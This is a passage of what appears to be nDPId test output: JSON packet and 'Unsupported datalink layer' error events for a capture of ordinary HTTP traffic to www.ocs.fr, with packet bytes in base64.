-00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":896,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUD85QABABgL5wKi0ArL40NKmXgBQrzCn\/DkzOEvwEAQTR4QAAAEBCAoANZjWGkFpTgEBBRo5M14\/OTNjqzkzSI85M037OTM9tzkzQyM="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":897,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843612} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD86QABABgMAwKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTZaYAAAEBCAoANZjdGkFpTgEBBRI5Mz23OTNN+zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":898,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843703} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":898,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD87QABABgL\/wKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTYDEAAAEBCAoANZjmGkFpTgEBBRI5Mz23OTNTZzkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":899,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843788} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":899,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD88QABABgMGwKi0ArL40NKmXgBQrzCn\/DkzU2ewEARAaFIAAAEBCAoANZjvGkFpcAEBBQo5M14\/OTNjqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":900,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843851} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":900,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD89QABABgL9wKi0ArL40NKmXgBQrzCn\/DkzU2fQEARA\/joAAAEBCAoANZj1GkFpcAEBBRI5M2kXOTNugzkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":901,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843852} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":901,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8+QABABgL8wKi0ArL40NKmXgBQrzCn\/DkzU2fQEARA+M4AAAEBCAoANZj1GkFpcAEBBRI5M2kXOTNz7zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":902,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843926} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":902,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8\/QABABgL7wKi0ArL40NKmXgBQrzCn\/DkzWNPQEARu8yAAAAEBCAoANZj9GkFpfAEBBRI5M2kXOTNz7zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":903,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843927} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":903,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9AQABABgMCwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbPH0AAAEBCAoANZj9GkFpfAEBBQo5M2kXOTNz7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":904,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843990} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":904,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9BQABABgMBwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbNwsAAAEBCAoANZkDGkFpfAEBBQo5M2kXOTN5Ww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":905,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843995} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":905,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9CQABABgMAwKi0ArL40NKmXgBQrzCn\/DkzY6uwEASbMZ8AAAEBCAoANZkDGkFpfAEBBQo5M2kXOTN+xw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":906,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844047} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":906,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9DQABABgL3wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbhncAAAEBCAoANZkJGkFpfAEBBRI5M4mfOTOPCzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":907,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844055} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":907,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9EQABABgL2wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbgQoAAAEBCAoANZkKGkFpfAEBBRI5M4mfOTOUdzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":908,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844085} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":908,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9FQABABgL1wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbe5sAAAEBCAoANZkNGkFpfAEBBRI5M4mfOTOZ4zkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":909,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844095} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":909,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9GQABABgL0wKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbdi4AAAEBCAoANZkOGkFpfAEBBRI5M4mfOTOfTzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":910,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844131} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":910,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9HQABABgLzwKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbcL8AAAEBCAoANZkRGkFpfAEBBRI5M4mfOTOkuzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":911,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844154} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":911,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9IQABABgLywKi0ArL40NKmXgBQrzCn\/DkzY6vQEASba1AAAAEBCAoANZkUGkFpfAEBBRI5M4mfOTOqJzkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":912,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844195} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":912,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9JQABABgLxwKi0ArL40NKmXgBQrzCn\/DkzY6vQEASbaZcAAAEBCAoANZkYGkFpfAEBBRI5M4mfOTOr3DkzaRc5M37H"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":913,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844231} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":913,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9KQABABgL4wKi0ArL40NKmXgBQrzCn\/DkzfsewEATIyH4AAAEBCAoANZkbGkFpngEBBQo5M4mfOTOr3A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":914,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844268} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":914,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9LQABABgL3wKi0ArL40NKmXgBQrzCn\/DkzhDOwEAT1wtwAAAEBCAoANZkfGkFpowEBBQo5M4mfOTOr3A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":915,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844269} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":915,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9MQABABgMCwKi0ArL40NKmXgBQrzCn\/Dkzq9yAEAUjeP8AAAEBCAoANZkfGkFpow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":916,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844329} -00533{"packet_event_id":1,"packet_event_name":"packet","packet_id":916,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":208,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":208,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAA0D9NQABABgJlwKi0ArL40NKmXgBQrzCn\/Dkzq9yAGAUj5DYAAAEBCAoANZklGkFpo0dFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMjQ2MzgvdHZfZGV0YWlsX2FmdGVyZWFydGh4dzAwNzk2MTVfY3NuX2I0MDljLmpwZyBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpIb3N0OiB3d3cub2NzLmZyDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":917,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844364} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":917,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9OQABABgMAwKi0ArL40NKmXgBQrzComDkzsUiAEAVQcrYAAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":918,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844365} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":918,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9PQABABgL\/wKi0ArL40NKmXgBQrzComDkztrSAEAV9bR0AAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":919,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844367} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":919,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9QQABABgL+wKi0ArL40NKmXgBQrzComDkzvCCAEAWqZ4QAAAEBCAoANZkpGkFprQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":920,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844402} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":920,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9RQABABgL9wKi0ArL40NKmXgBQrzComDkzwYyAEAXYYeQAAAEBCAoANZksGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":921,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844404} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":921,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9SQABABgL8wKi0ArL40NKmXgBQrzComDkzxviAEAYFXEoAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":922,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844405} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":922,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9TQABABgL7wKi0ArL40NKmXgBQrzComDkzzGSAEAYyVrEAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":923,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844407} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":923,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9UQABABgL6wKi0ArL40NKmXgBQrzComDkz0dCAEAZfURgAAAEBCAoANZktGkFpsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":924,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844707} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":924,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9VQABABgL5wKi0ArL40NKmXgBQrzComDkz1zyAEAaNS0QAAAEBCAoANZlLGkFpzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":925,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844788} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":925,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9WQABABgLswKi0ArL40NKmXgBQrzComDkz1zywEAaNzlAAAAEBCAoANZlTGkFpzAEBBQo5M+eAOTPs7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":926,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844864} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":926,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9XQABABgLrwKi0ArL40NKmXgBQrzComDkz3KiwEAa6yKIAAAEBCAoANZlaGkFp2gEBBQo5M+eAOTPs7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":927,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844866} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":927,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9YQABABgLqwKi0ArL40NKmXgBQrzComDkz4hSwEAbnwwkAAAEBCAoANZlaGkFp2gEBBQo5M+eAOTPs7A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":928,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844907} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":928,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9ZQABABgLpwKi0ArL40NKmXgBQrzComDkz4hSwEAbnvZgAAAEBCAoANZlfGkFp2gEBBQo5M+eAOTPyWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":929,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844913} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":929,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9aQABABgLowKi0ArL40NKmXgBQrzComDkz4hSwEAbnuCwAAAEBCAoANZlfGkFp2gEBBQo5M+eAOTP3xA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":930,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652844951} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":930,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9bQABABgLnwKi0ArL40NKmXgBQrzComDkz4hSwEAbnsrwAAAEBCAoANZljGkFp2gEBBQo5M+eAOTP9MA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":931,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845018} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":931,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9cQABABgLewKi0ArL40NKmXgBQrzComDkz4hTQEAbnFZkAAAEBCAoANZlqGkFp2gEBBRI5NAKcOTQICDkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":932,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845085} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":932,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9dQABABgLdwKi0ArL40NKmXgBQrzComDkz4hTQEAbnECYAAAEBCAoANZlxGkFp2gEBBRI5NAKcOTQNdDkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":933,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845125} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":933,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD9eQABABgLcwKi0ArL40NKmXgBQrzComDkz4hTQEAbnCrYAAAEBCAoANZl1GkFp2gEBBRI5NAKcOTQS4Dkz54A5M\/0w"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":934,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845159} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":934,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9fQABABgLjwKi0ArL40NKmXgBQrzComDkz\/TCwEAcUZnEAAAEBCAoANZl4GkFp+wEBBQo5NAKcOTQS4A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":935,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845192} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":935,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9gQABABgLuwKi0ArL40NKmXgBQrzComDk0EuCAEAdCDocAAAEBCAoANZl7GkFqAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":936,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845276} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":936,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9hQABABgLhwKi0ArL40NKmXgBQrzComDk0EuCwEAdCL\/oAAAEBCAoANZmEGkFqAAEBBQo5NBhMOTQduA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":937,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845277} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":937,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9iQABABgLgwKi0ArL40NKmXgBQrzComDk0EuCwEAdCKo4AAAEBCAoANZmEGkFqAAEBBQo5NBhMOTQjJA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":938,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845304} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":938,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9jQABABgLfwKi0ArL40NKmXgBQrzComDk0EuCwEAdCJR8AAAEBCAoANZmHGkFqAAEBBQo5NBhMOTQokA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":939,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845306} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":939,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9kQABABgLewKi0ArL40NKmXgBQrzComDk0EuCwEAdCH7MAAAEBCAoANZmHGkFqAAEBBQo5NBhMOTQt\/A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":940,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845341} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":940,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9lQABABgLpwKi0ArL40NKmXgBQrzComDk0LfyAEAdv8yAAAAEBCAoANZmKGkFqDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":941,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845343} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":941,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9mQABABgLowKi0ArL40NKmXgBQrzComDk0M2iAEAec7YcAAAEBCAoANZmKGkFqDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":942,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845411} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":942,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9nQABABgLnwKi0ArL40NKmXgBQrzComDk0ONSAEAfJ5+QAAAEBCAoANZmRGkFqEQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 